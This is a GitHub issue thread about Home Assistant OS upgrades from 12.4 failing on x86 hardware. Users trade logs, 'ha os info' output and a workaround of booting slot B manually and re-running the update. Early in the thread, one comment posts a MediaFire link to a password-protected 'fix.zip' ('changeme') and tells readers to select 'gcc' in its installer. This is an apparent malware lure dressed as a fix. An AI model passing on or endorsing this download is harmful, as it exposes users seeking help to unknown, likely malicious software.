home-assistant/operating-system #3566: Cannot upgrade from 12.4

GazTheGeek, 2024-08-28:
### Describe the issue you are experiencing

This has been happening since 13.0 - When I initiate the OS upgrade from the user interface it goes through the motions and restarts but the upgrade does not complete. Nothing in the logs is obvious.

### What operating system image do you use?

generic-x86-64 (Generic UEFI capable x86-64 systems)

### What version of Home Assistant Operating System is installed?

12.4

### Did the problem occur after upgrading the Operating System?

Yes

### Hardware details

Generic x86 hardware 

### Steps to reproduce the issue

1. Tried to upgrade
2. Upgrade completes and system restarts but when it comes back there is no change. cannot find anything useful in the logs. (Admittedly I do not know what I am looking for)
3. I have another system at a different location with the same hardware - upgrades have no issues.

### Anything in the Supervisor logs that might be useful for us?

```txt
When upgrade is initiated i get this entry in the logs.

2024-08-28 15:05:36.985 INFO (MainThread) [supervisor.os.manager] Fetch OTA update from https://os-artifacts.home-assistant.io/13.1/haos_generic-x86-64-13.1.raucb

These are the first few lines when the system restarts.

2024-08-28 14:52:40.120 INFO (MainThread) [supervisor.docker.multicast] Starting Multicast ghcr.io/home-assistant/amd64-hassio-multicast with version 2024.03.0 - Host
2024-08-28 14:52:40.123 INFO (MainThread) [supervisor.homeassistant.secrets] Loaded 1 Home Assistant secrets
2024-08-28 14:52:40.143 INFO (MainThread) [supervisor.docker.interface] Attaching to ghcr.io/home-assistant/generic-x86-64-homeassistant with version 2024.8.3
/usr/local/lib/python3.12/site-packages/cpe/comp/cpecomp1_1.py:57: SyntaxWarning: invalid escape sequence '\w'
  _STRING = "\w\.\-,\(\)@\#"
/usr/local/lib/python3.12/site-packages/cpe/comp/cpecomp2_2.py:52: SyntaxWarning: invalid escape sequence '\d'
  _VALUE_PATTERN = "^([\d\w\._\-~%]+)$"
/usr/local/lib/python3.12/site-packages/cpe/cpe2_3_fs.py:97: SyntaxWarning: invalid escape sequence '\:'
  _parts_pattern = "^cpe:2.3:{0}\:{1}\:{2}\:{3}\:{4}\:{5}\:{6}\:{7}\:{8}\:{9}\:{10}$".format(
2024-08-28 14:52:40.176 INFO (MainThread) [supervisor.os.manager] Detect Home Assistant Operating System 12.4 / BootSlot B
2024-08-28 14:52:40.544 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/core repository
2024-08-28 14:52:40.544 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/git/5c53de3b repository
2024-08-28 14:52:40.544 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/git/de91e161 repository
2024-08-28 14:52:40.545 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/git/cebe7a76 repository
2024-08-28 14:52:40.546 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/git/d5369777 repository
2024-08-28 14:52:40.547 INFO (MainThread) [supervisor.store.git] Loading add-on /data/addons/git/a0d7b954 repository
```

### Anything in the Host logs that might be useful for us?

```txt
Nothing stands out. Not sure what I'm looking for.
```

### System information

## System Information

version | core-2024.8.3
-- | --
installation_type | Home Assistant OS
dev | false
hassio | true
docker | true
user | root
virtualenv | false
python_version | 3.12.4
os_name | Linux
os_version | 6.6.29-haos
arch | x86_64
timezone | Australia/Sydney
config_dir | /config

<details><summary>Home Assistant Community Store</summary>

GitHub API | ok
-- | --
GitHub Content | ok
GitHub Web | ok
HACS Data | ok
GitHub API Calls Remaining | 5000
Installed Version | 2.0.0
Stage | waiting
Available Repositories | 1390
Downloaded Repositories | 8

</details>

<details><summary>Home Assistant Cloud</summary>

logged_in | true
-- | --
subscription_expiration | September 14, 2024 at 10:00 AM
relayer_connected | true
relayer_region | ap-southeast-1
remote_enabled | true
remote_connected | true
alexa_enabled | false
google_enabled | false
remote_server | ap-southeast-1-0.ui.nabu.casa
certificate_status | ready
instance_id | 55618dd26c814a76b19c0afc302de080
can_reach_cert_server | ok
can_reach_cloud_auth | ok
can_reach_cloud | ok

</details>

<details><summary>Home Assistant Supervisor</summary>

host_os | Home Assistant OS 12.3
-- | --
update_channel | stable
supervisor_version | supervisor-2024.08.0
agent_version | 1.6.0
docker_version | 25.0.5
disk_total | 219.4 GB
disk_used | 23.3 GB
healthy | true
supported | true
host_connectivity | true
supervisor_connectivity | true
ntp_synchronized | true
virtualization | 
board | generic-x86-64
supervisor_api | ok
version_api | ok
installed_addons | UniFi Network Application (3.2.0), Terminal & SSH (9.14.0), File editor (5.8.0), ESPHome (2024.8.0), Matter Server (6.4.1), Node-RED (18.0.5), OneDrive Backup (2.3.1)

</details>

<details><summary>Dashboards</summary>

dashboards | 3
-- | --
resources | 3
views | 9
mode | storage

</details>

<details><summary>Recorder</summary>

oldest_recorder_run | August 19, 2024 at 2:25 AM
-- | --
current_recorder_run | August 28, 2024 at 3:09 PM
estimated_db_size | 642.06 MiB
database_engine | sqlite
database_version | 3.45.3

</details>

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Sergmasharov, 2024-09-01:
I have same issue. It try to boot slot B. kernel panic - not syncing. After 3 try, boots 12.4 version from slot A.

GazTheGeek, 2024-09-02:
I'd really appreciate some help in fixing this please.

sairon, 2024-09-02:
@GazTheGeek `Generic x86 hardware` is quite vague, could you be more specific? Can you try installing the update with a display connected and check the logs? If some error appears, a camera capture of that would help.

@Sergmasharov There should be a stack trace before the kernel panic line, can you share it here?

Sergmasharov, 2024-09-04:
> @GazTheGeek `Generic x86 hardware` is quite vague, could you be more specific? Can you try installing the update with a display connected and check the logs? If some error appears, a camera capture [...]

Where I can find it?

GazTheGeek, 2024-09-06:
Ok so here is what I have done so far.

1. The hardware is a DELL OptiPlex 9020.  Intel Processor - not sure which one.
2. I connected a monitor and ran "os update"
3. At first It said "Processing..." then after a few minutes said "Done"
4. Then "Command completed successfully."
5. HA restarted but nothing had changed.
6. I did a physical reboot of the hardware and then tried to update again using the UI and Volla! the update was successful.

Go figure.

Sergmasharov, 2024-09-06:
I try `ha host logs -n2000 -b-1`
and get message: Logs only contain 1 boots~ #
How to update?

Sergmasharov, 2024-10-16:
Still cant update to 13.2 from 12.4

GazTheGeek, 2024-10-16:
I was able to solve my issue with a hard reboot of the machine. A soft restart of HA did not work.

Patrice3122, 2024-10-20:
Hi,

I add a similar issue. I ran the following CLI command from the terminal **ha os info** and discovered that the **Boot A** version record was **null**. Screenshot below:

[image]

Using the CLI command **ha os update --version xx.xx**, where xx.xx is the OS version number. I tried to downgrade the OS version to 12.3, upgrade to 13.0, and upgrade to 13.1 after a safe-mode start. None of these attempts has been successful; the **Boot A** version record was still **null**. Screenshot below:

[image]

### Resolution:
Finally, I resolved the issue. You will need to connect a screen and a keyboard to the host. From the host, during the startup process, select **Boot B**. Be aware that the boot menu appears only briefly, and you will need to use the arrow down key to select **Boot B**.

[image]

I run the CLI command: **ha os update --version 13.2**. The update process took longer than usual, and after the reboot, Home Assistant OS 13.2 was up and running, having boot on **Boot A**. Screenshot below:

[image].

😊

Patrice3122, 2024-12-05:
Hi,

I encountered the same issue when attempting to update from 13.2 to 14.0. Using the CLI command: **ha os info**, I discovered the following:

board: generic-x86-64
boot: A
boot_slots:
	A:
	  state: booted
	  status: good
	  version 13.2
	B:
	  state: inative
	  status: good
	  version: 14.0

Based on the Home Assistant update process documentation (available [here](https://developers.home-assistant.io/docs/operating-system/update-system/), I discovered that the update process first updates Slot B, restarts the host, and attempts to boot from Slot B. If booting from Slot B is successful, the process then updates Slot A to complete the update.

To address the update issue on my system, I decided to run the following CLI command: **ha os boot-slot B**, forcing the system to boot from Slot B and complete the update. However, this command did not function as expected. During the reboot process, Slot A remained selected and highlighted as the default in the GRUB menu, causing Home Assistant to start from Slot A. The system's inability to boot from Slot B appears to explain why Home Assistant updates were not correctly implemented on my system.

**Resolution:**
I resolved the issue using the same method applied to previous update problems.

**1. Downgrade Slot B**: On the localhost, I first downgraded Slot B to an earlier version using the command: **ha os update --version 13.1**.
NB: Any attempt to update directly to version 13.2 returned the message: Version already installed.

**2. Manual Boot Selection**: During the startup process, I manually selected Slot B from the boot menu. Note that the boot menu appears briefly during startup. To select Slot B, you must press the down arrow key, and once highlighted, press the Enter key to confirm.

**3. Update Slot A**: With the system booted from Slot B, I ran the CLI command: **ha os update --version 14.0**. Since the system was running on Slot B, the update process applied to Slot A.

**4. Final Verification**: After a host reboot, Home Assistant OS 14.0 was successfully running, booted from Slot A.

mirkocampisi, 2024-12-12:
@Patrice3122 Hi, what system are you running on? I have your same problem but I'm on Raspberry Pi4 and I don't have GRUB or any boot menu. If I connect a monitor to the Rpi4 it doesn't display anything at boot.

mauricecyril, 2024-12-15:
Hi @mirkocampisi I'm running a non-UEFI x86 machine.

Patrice3122, 2024-12-19:
> @Patrice3122 Hi, what system are you running on? I have your same problem but I'm on Raspberry Pi4 and I don't have GRUB or any boot menu. If I connect a monitor to the Rpi4 it doesn't display anything at boot.

I'm running a non-UEFI x86 old laptop. :)

rogerleung0411, 2024-12-21:
I just realized i encountered the same issue. Failed to upgrade from 12.4 to any later versions including the latest 14.1

Patrice3122, 2024-12-21:
I encountered the same issue again when attempting to update to 14.1 from version 14.0.

To resolve the issue, I applied the same method as explained earlier, starting with a downgrade to version 13.1.

closed 2025-03-30 by github-actions[bot]